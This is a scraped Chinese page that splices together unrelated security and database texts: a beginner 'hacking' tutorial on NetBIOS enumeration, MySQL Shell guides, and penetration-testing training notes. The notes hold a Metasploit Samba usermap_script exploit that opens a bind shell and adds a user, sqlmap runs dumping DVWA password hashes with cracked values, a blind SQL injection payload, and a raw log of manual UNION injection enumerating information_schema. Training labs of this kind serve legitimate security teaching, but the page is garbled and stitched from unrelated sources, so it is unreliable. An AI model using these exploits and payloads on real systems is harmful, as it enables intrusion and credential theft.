from mysql to shell渗透测试笔记
网络黑客入侵渗透基础教程
网络黑客入侵渗透基础教程许多人想要学习黑客基础知识,成为一名电脑高手,但是苦苦没有教程怎么办?店铺就在这里教大家黑客基础教程中黑客入侵渗透教程,希望能帮到大家。
黑客基础教程中黑客入侵渗透教程有一种被动操作系统识别方法,就是监控不同系统之间网络包的情况来判断目标的操作系统类型siphon被用来进行这方面的测试,这个工作原理如下:主要TCP的四个字段判断:1,TTL:出站的包的存活时间;2,Window size:窗口大小;3,DF:是否设置了不准分片位;4,TOS:是否设置了服务类型。
综合这些信息可以大概判断出目标的系统,但不能百分百确定。
黑客入侵渗透第一步:查点利用查点技术可以得到比前面讲的更多更具体的有用信息,例如:帐户信息等。
1,Windows系统查点技术利用NetBIOS规则,首先介绍NetBIOS,NetBOIS位于TCP/IP之上,定义了多个TCP和UDP端口。
----TCP(1),139:nbsession:NetBOIS会话。
例如:net use \\IP\ipc$Content$nbsp;" " /user:" ".(2),42:WINS:Windows Internet名字系统(UDP端口也是42)。
----UDP(1)137:nbname:名字查询。
例如:nbtstat -A IP //03中显示的不是计算机名就是用户名(2)138:nbdatagram:UDP数据报服务例如:net send /d:domain-name "Hello"得到用户名利用到了IPC$空会话和sid工具。
sid工具由两个小工具组成:user2sid 和er2sid获得用户名或组名的sid;sid2user则是输入一个sid 而获得相应用户名的和组名,sid就是在创建用户时而创建的,相当于UNIX系统下的UID,WIN 系统权限的检查就是通过对SID的检查的。
使用shell脚本进行数据库操作
使用shell脚本进行数据库操作Shell脚本是一种可以在Unix、Linux和其他操作系统中运行的脚本语言,它可以帮助我们自动化执行各种任务。
在数据库管理和操作中,Shell脚本也可以发挥重要作用。
本文将介绍如何使用Shell脚本进行数据库操作,包括连接数据库、执行SQL语句、导入导出数据等常见操作。
一、连接数据库在使用Shell脚本进行数据库操作之前,首先需要连接数据库。
不同的数据库系统可能具有不同的连接命令,下面以MySQL数据库为例。
要连接MySQL数据库,可以使用以下命令:```shell#!/bin/bashMYSQL_USER="your_username"MYSQL_PASSWORD="your_password"mysql -u $MYSQL_USER -p$MYSQL_PASSWORD -e "useyour_database"```上述脚本首先定义了两个变量`MYSQL_USER`和`MYSQL_PASSWORD`,分别存储数据库的用户名和密码。
然后通过`mysql`命令连接数据库,并使用`-u`参数指定用户名,`-p`参数指定密码,`-e`参数执行指定的SQL语句。
其中,`use your_database`是一个示例,你可以根据实际情况修改为你要连接的数据库。
二、执行SQL语句连接数据库后,我们可以使用Shell脚本执行各种SQL语句,例如创建表、插入数据、更新数据等。
```shell#!/bin/bashMYSQL_USER="your_username"MYSQL_PASSWORD="your_password"mysql -u $MYSQL_USER -p$MYSQL_PASSWORD -e "useyour_database; create table your_table (id int, name varchar(255)); insert into your_table values (1, 'John'); select * from your_table"```上述脚本在连接数据库后,执行了三条SQL语句:创建表`your_table`,插入一条数据,然后查询表中的数据。
mysql shell用法
mysql shell用法MySQL Shell 是一个交互式的命令行工具,用于与 MySQL 数据库进行交互和管理。
它提供了一个强大的环境,可以执行 SQL 查询、创建、修改和删除数据库对象,以及执行管理任务。
首先,我们需要了解如何连接到 MySQL 数据库。
在命令行中输入以下命令:```mysqlsh --uri=user:password@host:port```其中,user 是数据库的用户名,password 是密码,host 是数据库所在的主机名或 IP 地址,port 是数据库服务器的端口号。
成功连接后,你将看到 MySQL Shell 的提示符。
接下来,我们可以执行各种 SQL 查询和操作。
以下是一些基本的用法:1. 执行 SQL 查询:可以直接输入 SQL 语句,如 SELECT、INSERT、UPDATE、DELETE 等,以执行对数据库的查询和操作。
例如,查询一个表的所有数据:```SELECT * FROM table_name;```2. 创建和修改数据库对象:通过使用 CREATE、ALTER、DROP 等关键字,可以创建、修改和删除数据库对象,如表、索引、视图、存储过程等。
例如,创建一个新的表:```CREATE TABLE table_name (column1 datatype, column2 datatype, ...);```3. 连接到不同的数据库:可以使用 USE 命令切换到不同的数据库。
例如,切换到名为 "database_name" 的数据库:```USE database_name;```4. 导入和导出数据:使用 LOAD DATA INFILE 命令可以从文件导入数据到表中,而使用 SELECT INTO OUTFILE 命令可以将查询结果导出为文件。
例如,将一个 CSV 文件导入到表中:```LOAD DATA INFILE 'filename.csv' INTO TABLE table_name FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n';```5. 退出 MySQL Shell:通过输入 exit 或 quit 命令,可以退出 MySQL Shell。
mysql shell使用方法
mysql shell使用方法MySQL Shell 是一种命令行工具,用于连接和管理 MySQL 数据库。
下面是一些 MySQL Shell 的使用方法:1. 启动 MySQL Shell:可以在命令行中输入“mysqlsh”命令,然后按回车键启动MySQL Shell。
2. 连接到 MySQL 数据库:在 MySQL Shell 中,连接到 MySQL 数据库可以使用以下命令:```\connect username@hostname:port```其中,username 表示数据库用户名,hostname 表示数据库服务器主机名,port 表示数据库服务器端口号。
如果连接的是本地数据库,可以省略 username、hostname 和 port。
3. 提交 SQL 查询:连接到MySQL 数据库后,可以使用SQL 查询来操作数据库。
例如,执行 SELECT 查询:```SELECT * FROM table_name;```其中,table_name 是要查询的表名。
4. 退出 MySQL Shell:在 MySQL Shell 中,可以使用以下命令退出:```\q```5. 使用 JavaScript 脚本:MySQL Shell 还支持使用 JavaScript 脚本来操作数据库。
可以在 MySQL Shell 中编写 JavaScript 脚本,并通过以下命令执行脚本:```\source /path/to/script.js```其中,/path/to/script.js 是脚本文件的路径。
除了上述的基本使用方法外,MySQL Shell 还提供了许多其他功能,如事务管理、用户管理等。
可以使用 help 命令查看更多的命令和用法信息。
MySQL Shell 除了命令行工具外,还提供了一种交互式界面,可以通过“\sql”命令进入 SQL Shell 模式,或者通过“\js”命令进入 JavaScript Shell 模式。
mysql shell语法
mysql shell语法MySQL Shell 是 MySQL 新一代客户端工具,使用 Python、JS 和SQL 语言进行交互,支持执行 SQL 查询、JavaScript 和 Python 脚本,同时也可以用作管理 MySQL Shell 实例、集群、备份等操作。
以下是 MySQL Shell 常用的语法:1.连接MySQL实例:```mysqlsh。
```。
- user:MySQL 用户名;- hostname:MySQL 实例主机名;- port:MySQL 实例的端口号;--p:以交互式密码模式连接MySQL。
2.执行SQL查询:```mysql。
mysqlsh> \sql。
mysql > SELECT * FROM databases;。
```。
3. 执行 JavaScript 和 Python 脚本:```mysql。
mysqlsh> \js。
mysql-js> \py。
mysqlpy> \eval 'print("Hello, World!")'。
```。
4. 查看 MySQL Shell 版本:```mysql。
mysqlsh> \status。
```。
5.显示帮助信息:```mysql。
mysqlsh> \help。
```。
6. 退出 MySQL Shell:```mysql。
mysqlsh> \q。
```。
以上是 MySQL Shell 的常用语法,更多语法和用法可以参考官方文档。
渗透测试 实验报告 (中国移动安全部)
渗透测试培训3月13日第一天:主要实验总结首先利用struts2漏洞,可以直接执行任意命令,取得主机控制权。
实验环境:KALI linux 作为攻击工具;owasp 作为靶机2003 metaspoitable 实现能够成功访问使用metaspliot完成对于靶机samba 服务的攻击,获取shell 权限search samba 查找模块Use multi/samba/usemap_script 选择渗透攻击模块Show payloads 查看与该渗透模块相兼容的攻击载荷Set payload cmd/unix/bind_netcat选择netcat工具在渗透攻击成功后执行shellShow options 查看需要设置的参数Set RHOST 10.10.10.254 设置主机攻击主机Exploit启动攻击1、首先安装vm虚拟机程序,开启kali,owasp和metaspoitalbe等工具和搭建环境,使得网络可达,网络配置上选择nat模式,地址范围为10.10.10.0/242、开启kali虚机,进入root模式,首先进入msfconsle,修改初始密码为123456msf〉> passwd[*] exec: passwd输入新的UNIX 密码:重新输入新的UNIX 密码:passwd:已成功更新密码然后寻找samba模块msf > search sambaMatching Modules================Name Disclosure Date Rank Description---- --------------- ---- ----------- auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversalauxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflowauxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflowauxiliary/dos/samba/read_nttrans_ea_list normal Samba read_nttrans_ea_list Integer Overflowexploit/freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86)exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86)exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflowexploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Samba SetInformationPolicy AuditEventsInfo Heap Overflowexploit/linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Linux x86)exploit/multi/samba/nttrans 2003-04-07 average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflowexploit/multi/samba/usermap_script 2007-05-14 excellent Samba "username map script" Command Executionexploit/osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflowexploit/osx/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Mac OS X PPC)exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflowexploit/solaris/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Solaris SPARC)exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Executionexploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Executionexploit/windows/http/sambar6_search_results 2003-06-21 normal Sambar 6 Search Results Buffer Overflowexploit/windows/license/calicclnt_getconfig 2005-03-02 average Computer Associates License Client GETCONFIG Overflowpost/linux/gather/enum_configs normal Linux Gather Configurationsmsf > use multi/samba/usermap_script 选择渗透攻击模块msf exploit(usermap_script) > show payloads 查看与该渗透模块相兼容的攻击载荷Compatible Payloads===================Name Disclosure Date Rank Description---- --------------- ---- -----------cmd/unix/bind_awk normal Unix Command Shell, Bind TCP (via AWK)cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd)cmd/unix/bind_lua normal Unix Command Shell, Bind TCP (via Lua)cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat)cmd/unix/bind_netcat_gaping normal Unix Command Shell, Bind TCP (via netcat -e)cmd/unix/bind_netcat_gaping_ipv6 normal Unix Command Shell, Bind TCP (via netcat -e) IPv6cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6cmd/unix/bind_zsh normal Unix Command Shell, Bind TCP (via Zsh)cmd/unix/generic normal Unix Command, Generic Command Executioncmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet)cmd/unix/reverse_awk normal Unix Command Shell, Reverse TCP (via AWK)cmd/unix/reverse_lua normal Unix Command Shell, Reverse TCP (via Lua)cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat)cmd/unix/reverse_netcat_gaping normal Unix Command Shell, Reverse TCP (via netcat -e)cmd/unix/reverse_openssl normal Unix Command Shell, Double Reverse TCP SSL (openssl)cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl)cmd/unix/reverse_php_ssl normal Unix Command Shell, Reverse TCP SSL (via php)cmd/unix/reverse_python normal Unix Command Shell, Reverse TCP (via Python)cmd/unix/reverse_python_ssl normal Unix Command Shell, Reverse TCP SSL (via python)cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet)cmd/unix/reverse_zsh normal Unix Command Shell, Reverse TCP (via Zsh)msf exploit(usermap_script) > set payload cmd/unix/bind_netcat 选择netcat工具在渗透攻击成功后执行shellpayload => cmd/unix/bind_netcatmsf exploit(usermap_script) > show options 查看需要设置的参数msf exploit(usermap_script) > set RHOST 10.10.10.254设置主机攻击主机RHOST => 10.10.10.254msf exploit(usermap_script) > exploit启动攻击[*] Started bind handler[*] Command shell session 1 opened (10.10.10.128:56558 -> 10.10.10.254:4444) at 2015-03-13 16:06:40 +0800已经取得10.10.10.254机子的控制权,可以增加用户useradd test 用户增加成功&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 存活探测-PU -sn UDP ping不列服务,-Pn不适用pingnmap -sS -Pn xx.xx.xx.xx tcp syn 扫描不发送icmpnamp -sV -Pn xx.xx.xx.xx 列出服务详细信息namp -PO -script=smb-check-vulns xx.xx.xx.xx 查找ms-08067漏洞&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&nmap 网站扫描msf > nmapmsf > nmap -sV -Pn 10.10.10.254[*] exec: nmap -sV -Pn 10.10.10.254Starting Nmap 6.46 ( ) at 2015-03-13 16:38 CSTNmap scan report for 10.10.10.254Host is up (0.00020s latency).All 1000 scanned ports on 10.10.10.254 are filteredMAC Address: 00:50:56:E7:1B:31 (VMware)Service detection performed. Please report any incorrect results at /submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.84 secondsmsf > nmap -PO -script=smb-check-vulns 10.10.10.254[*] exec: nmap -PO -script=smb-check-vulns 10.10.10.254Starting Nmap 6.46 ( ) at 2015-03-13 16:47 CSTNmap scan report for 10.10.10.254Host is up (0.00021s latency).All 1000 scanned ports on 10.10.10.254 are filteredMAC Address: 00:50:56:E7:1B:31 (VMware)map done: 1 IP address (1 host up) scanned in 23.06 seconds %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%msf > nmap -O [*] exec: nmap -O Starting Nmap 6.46 ( ) at 2015-03-13 17:16 CSTNmap scan report for (211.100.35.132)Host is up (0.0054s latency).Not shown: 999 filtered portsPORT STATE SERVICE80/tcp open httpWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Brother MFC-7820N printer (94%), Digi Connect ME serial-to-Ethernet bridge (94%), Netgear SC101 Storage Central NAS device (91%), ShoreTel ShoreGear-T1 VoIP switch (91%), Aastra 480i IP Phone or Sun Remote System Control (RSC) (91%), Aastra 6731i VoIP phone or Apple AirPort Express WAP (91%), Cisco Wireless IP Phone 7920-ETSI (91%), GoPro HERO3 camera (91%), Konica Minolta bizhub 250 printer (91%), Linux 2.4.26 (Slackware 10.0.0) (86%)No exact OS matches for host (test conditions non-ideal).OS detection performed. Please report any incorrect results at /submit/ .Nmap done: 1 IP address (1 host up) scanned in 57.88 secondsmsf > use auxiliary/scanner/http/dir_scannermsf auxiliary(dir_scanner) > set THREADS 50THREADS => 50msf auxiliary(dir_scanner) > set RHOSTS RHOSTS => msf auxiliary(dir_scanner) > run[*] Detecting error code[*] Detecting error code[*] Scanned 2 of 2 hosts (100% complete)[*] Auxiliary module execution completedsqlmap 检查sql注入的漏洞root@kali:~# sqlmaproot@kali:~# sqlmap -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23"带cookie的方式查出这个网站数据库的用户和密码sqlmap/1.0-dev - automatic SQL injection and database takeover tool[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 11:50:20[11:50:20] [INFO] testing connection to the target URL[11:50:20] [INFO] testing if the target URL is stable. This can take a couple of seconds[11:50:21] [INFO] target URL is stable[11:50:21] [INFO] testing if GET parameter 'id' is dynamic[11:50:21] [INFO] confirming that GET parameter 'id' is dynamic[11:50:21] [INFO] GET parameter 'id' is dynamic[11:50:21] [INFO] heuristics detected web page charset 'ascii'[11:50:21] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')[11:50:21] [INFO] testing for SQL injection on GET parameter 'id'heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] ydo you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y [11:50:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[11:50:25] [WARNING] reflective value(s) found and filtering out[11:50:25] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable[11:50:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[11:50:25] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable[11:50:25] [INFO] testing 'MySQL inline queries'[11:50:25] [INFO] testing 'MySQL > 5.0.11 stacked queries'[11:50:25] [WARNING] time-based comparison requires larger statistical model, please wait...........[11:50:25] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'[11:50:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[11:50:36] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable[11:50:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[11:50:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found[11:50:36] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test[11:50:36] [INFO] target URL appears to have 2 columns in query[11:50:36] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection points with a total of 41 HTTP(s) requests:---Place: GETParameter: idType: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1' AND 4334=4334 AND 'iasX'='iasX&Submit=SubmitType: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE or HAVING clausePayload: id=1' AND (SELECT 4941 FROM(SELECT COUNT(*),CONCAT(0x71626e6f71,(SELECT (CASE WHEN (4941=4941) THEN 1 ELSE 0 END)),0x7163716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zAHU'='zAHU&Submit=SubmitType: UNION queryTitle: MySQL UNION query (NULL) - 2 columnsPayload: id=1' UNION ALL SELECT NULL,CONCAT(0x71626e6f71,0x4b497150534967787451,0x7163716271)#&Submit=SubmitType: AND/OR time-based blindTitle: MySQL > 5.0.11 AND time-based blindPayload: id=1' AND SLEEP(5) AND 'xfNp'='xfNp&Submit=Submit---[11:50:40] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Ubuntu 10.04 (Lucid Lynx)web application technology: PHP 5.3.2, Apache 2.2.14back-end DBMS: MySQL 5.0[11:50:40] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/10.10.10.129'[*] shutting down at 11:50:40root@kali:~# sqlmap -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id --dbs可以看出返回数据库为:[11:53:32] [WARNING] reflective value(s) found and filtering outavailable databases [2]:[*] dvwa[*] information_schemaroot@kali:~# sqlmap -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa --tables查看dvwa数据库Database: dvwa[2 tables]+-----------+| guestbook || users |+-----------+root@kali:~# sqlmap -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa -T users --columnsDatabase: dvwaTable: users[6 columns]+------------+-------------+| Column | Type |+------------+-------------+| user | varchar(15) || avatar | varchar(70) || first_name | varchar(15) || last_name | varchar(15) || password | varchar(32) || user_id | int(6) |+------------+-------------+root@kali:~# sqlmap -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa -T users -C user,password --dumpDatabase: dvwaTable: users[5 entries]+---------+--------------------------------------------+| user | password |+---------+--------------------------------------------+| 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) || admin | 21232f297a57a5a743894a0e4a801fc3 (admin) || gordonb | e99a18c428cb38d5f260853678922e03 (abc123) || pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 || smithy | 5f4dcc3b5aa765d61d8327deb882cf99 |+---------+--------------------------------------------+可以看出用户名为admin 密码是admin成功2day&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&情报收集whois 域名注册信息查询。
《Web安全攻防:渗透测试实战指南》笔记
《Web安全攻防:渗透测试实战指南》阅读记录目录一、基础篇 (3)1.1 Web安全概述 (4)1.1.1 Web安全定义 (5)1.1.2 Web安全重要性 (6)1.2 渗透测试概述 (6)1.2.1 渗透测试定义 (8)1.2.2 渗透测试目的 (9)1.2.3 渗透测试流程 (9)二、技术篇 (11)2.1 Web应用安全检测 (12)2.1.1 SQL注入攻击 (14)2.1.2 跨站脚本攻击 (16)2.1.3 文件上传漏洞 (17)2.2 操作系统安全检测 (19)2.2.1 操作系统版本漏洞 (19)2.2.2 操作系统权限设置 (20)2.3 网络安全检测 (21)2.3.1 网络端口扫描 (23)2.3.2 网络服务识别 (24)三、工具篇 (25)3.1 渗透测试工具介绍 (27)3.2 工具使用方法与技巧 (28)3.2.1 Kali Linux安装与配置 (31)3.2.2 Metasploit使用入门 (31)3.2.3 Wireshark使用技巧 (33)四、实战篇 (34)4.1 企业网站渗透测试案例 (36)4.1.1 漏洞发现与利用 (37)4.1.2 后门植入与维持 (39)4.1.3 权限提升与横向移动 (40)4.2 网站安全加固建议 (41)4.2.1 参数化查询或存储过程限制 (42)4.2.2 错误信息处理 (44)4.2.3 输入验证与过滤 (45)五、法规与政策篇 (46)5.1 国家网络安全法规 (47)5.1.1 《中华人民共和国网络安全法》 (48)5.1.2 相关法规解读 (49)5.2 企业安全政策与规范 (50)5.2.1 企业信息安全政策 (52)5.2.2 安全操作规程 (53)六、结语 (54)6.1 学习总结 (55)6.2 深入学习建议 (57)一、基础篇在深入探讨Web安全攻防之前,我们需要了解一些基础知识。
Web 安全是指保护Web应用程序免受未经授权访问、篡改或泄露的过程。
渗透笔记整理
91ri渗透笔记整理【渗透笔记】(壹)1.避免0day攻击的最好办法是实现启发式(Heuristic)或基于轮廓(Profile-based)的入侵检测系统。
2.常见的安全证书包括CCIE: Security、CEH、CISSP、CCSP、GIAC、OPSTA和Security+。
3.Nmap扫描主机开放端口,能够在运行IPSec的OpenBSD 2.7 系统上引发DOS攻击。
当使用-sO选项运行Nmap时,就会引起OpenBSD系统奔溃。
4.现在已知端口扫描能够在下述环境中引发DOS攻击:Efficient Networks Routers、pcAnywhere9.0、安装了Novell intraNetWare Client的Windows 95/98。
5.湿件(Wetware),湿件就是计算机中人类的因素。
6.被动侦查:用户组会议、Web网站上的信息、Edgars数据库、社工库、UUNet新闻组、商业伙伴、垃圾搜索、社会工程学;主动侦查:端口扫描、DNS查询、区域传输、ping 扫描、路由跟踪、OS特征检测.7.端口扫描的几种类型:TCP Connect()扫描、SYN扫描、NULL扫描、FIN扫描、ACK扫描、Xmas-Tree扫描、Dumb扫描、Reverse Ident扫描8.灰箱测试(Gray-Box):测试人员模拟内部雇员。
他们得到了一个内部网络的账号,并且拥有了访问网络的标准方法。
这项测试用于评估来自企业内部职员的攻击。
9.在netcat中,经常使用53端口监听的原因是:这个端口号是分配跟DNS使用的,通常防火墙开放这个端口。
如果选择其他不常用的端口,那么防火墙可能会阻断这些端口的流量。
10.盲注的核心语句:php?id=1 and (select ord(mid(group_concat(SCHEMA_NAME),20,1))from information_schema.schemata)>011.VLAN 跳跃攻击利用了DTP。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
http://192.168.128.128/http://192.168.128.128/cat.php?id=1%27You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1telnet 192.168.128.128 80http://192.168.128.128/cat.php?id=2%20order%20by%203#显示正常http://192.168.128.128/cat.php?id=2%20order%20by%204#显示正常http://192.168.128.128/cat.php?id=2%20order%20by%205#Unknown column '5' in 'order clause'http://192.168.128.128/cat.php?id=2%20union%20select%201,2,3,4显示所有页面http://192.168.128.128/cat.php?id=2%20union%20select%201,2,3,4,5The used SELECT statements have a different number of columnshttp://192.168.128.128/cat.php?id=2%20union%20select%20user(),database(),version(),4显示所有页面,但是没有user()等信息http://192.168.128.128/cat.php?id=1%20union%20select%20user(),database(),@@version,current _user()显示所有页面,但是没有user()等信息http://192.168.128.128/cat.php?id=1%20union%20select%201,tablename,3,4%20from%20inform ation_schema.tablesUnknown column 'tablename' in 'field list'http://192.168.128.128/cat.php?id=1%20union%20select%201,table_name,3,4%20from%20infor mation_schema.tablespicture: character_setsCHARACTER_SETSpicture: collationsCOLLATIONSpicture: collation_character_set_applicabilityCOLLATION_CHARACTER_SET_APPLICABILITYpicture: columnsCOLUMNSpicture: column_privilegesCOLUMN_PRIVILEGESpicture: enginesENGINESpicture: eventsEVENTSpicture: filesFILESpicture: global_statusGLOBAL_STATUSpicture: global_variablesGLOBAL_VARIABLESpicture: key_column_usageKEY_COLUMN_USAGEpicture: partitionsPARTITIONSpicture: pluginsPLUGINSpicture: processlistPROCESSLISTpicture: profilingpicture: referential_constraintsREFERENTIAL_CONSTRAINTSpicture: routinesROUTINESpicture: schemataSCHEMA TApicture: schema_privilegesSCHEMA_PRIVILEGESpicture: session_statusSESSION_STATUSpicture: session_variablesSESSION_V ARIABLESpicture: statisticsSTA TISTICSpicture: tablesTABLESpicture: table_constraintsTABLE_CONSTRAINTSpicture: table_privilegesTABLE_PRIVILEGESpicture: triggersTRIGGERSpicture: user_privilegesUSER_PRIVILEGESpicture: viewsVIEWSpicture: categoriescategoriespicture: picturespicturespicture: usersusershttp://192.168.128.128/cat.php?id=1%20union%20select%201,column_name,3,4%20from%20inf ormation_schema.columnspicture: character_set_nameCHARACTER_SET_NAMEpicture: default_collate_nameDEFAULT_COLLATE_NAMEpicture: descriptionDESCRIPTIONpicture: maxlenpicture: collation_name COLLATION_NAMEpicture: idIDpicture: is_defaultIS_DEFAULTpicture: is_compiledIS_COMPILEDpicture: sortlenSORTLENpicture: table_catalogTABLE_CATALOGpicture: table_schemaTABLE_SCHEMApicture: table_nameTABLE_NAMEpicture: column_nameCOLUMN_NAMEpicture: ordinal_positionORDINAL_POSITIONpicture: column_defaultCOLUMN_DEFAULTpicture: is_nullableIS_NULLABLEpicture: data_typeDA TA_TYPEpicture: character_maximum_length CHARACTER_MAXIMUM_LENGTH picture: character_octet_length CHARACTER_OCTET_LENGTH picture: numeric_precision NUMERIC_PRECISIONpicture: numeric_scaleNUMERIC_SCALEpicture: column_typeCOLUMN_TYPEpicture: column_keyCOLUMN_KEYpicture: extrapicture: privileges PRIVILEGESpicture: column_comment COLUMN_COMMENTpicture: grantee GRANTEEpicture: privilege_type PRIVILEGE_TYPEpicture: is_grantableIS_GRANTABLEpicture: engine ENGINEpicture: support SUPPORTpicture: comment COMMENTpicture: transactions TRANSACTIONSpicture: xaXApicture: savepointsSA VEPOINTSpicture: event_catalog EVENT_CATALOGpicture: event_schema EVENT_SCHEMApicture: event_name EVENT_NAMEpicture: definer DEFINERpicture: time_zone TIME_ZONEpicture: event_body EVENT_BODYpicture: event_definition EVENT_DEFINITIONpicture: event_type EVENT_TYPEpicture: execute_at EXECUTE_ATpicture: interval_value INTERV AL_V ALUEpicture: interval_field INTERV AL_FIELDpicture: sql_modeSQL_MODEpicture: starts STARTSpicture: endsENDSpicture: statusSTA TUSpicture: on_completion ON_COMPLETIONpicture: created CREATEDpicture: last_altered LAST_ALTEREDpicture: last_executedLAST_EXECUTEDpicture: event_comment EVENT_COMMENTpicture: originator ORIGINATORpicture: character_set_client CHARACTER_SET_CLIENTpicture: collation_connection COLLATION_CONNECTIONpicture: database_collationDA TABASE_COLLATIONpicture: file_idFILE_IDpicture: file_nameFILE_NAMEpicture: file_typeFILE_TYPEpicture: tablespace_name TABLESPACE_NAMEpicture: logfile_group_name LOGFILE_GROUP_NAMEpicture: logfile_group_number LOGFILE_GROUP_NUMBERpicture: fulltext_keys FULLTEXT_KEYSpicture: deleted_rows DELETED_ROWSpicture: update_countUPDATE_COUNTpicture: free_extentsFREE_EXTENTSpicture: total_extents TOTAL_EXTENTSpicture: extent_size EXTENT_SIZEpicture: initial_sizeINITIAL_SIZEpicture: maximum_size MAXIMUM_SIZEpicture: autoextend_size AUTOEXTEND_SIZEpicture: creation_time CREATION_TIMEpicture: last_update_time LAST_UPDATE_TIMEpicture: last_access_time LAST_ACCESS_TIMEpicture: recover_time RECOVER_TIMEpicture: transaction_counter TRANSACTION_COUNTERpicture: versionVERSIONpicture: row_formatROW_FORMATpicture: table_rowsTABLE_ROWSpicture: avg_row_lengthA VG_ROW_LENGTHpicture: data_lengthDA TA_LENGTHpicture: max_data_lengthMAX_DATA_LENGTHpicture: index_lengthINDEX_LENGTHpicture: data_freeDA TA_FREEpicture: create_timeCREATE_TIMEpicture: update_timeUPDATE_TIMEpicture: check_timeCHECK_TIMEpicture: checksumCHECKSUMpicture: variable_nameV ARIABLE_NAMEpicture: variable_valueV ARIABLE_V ALUEpicture: constraint_catalog CONSTRAINT_CATALOGpicture: constraint_schema 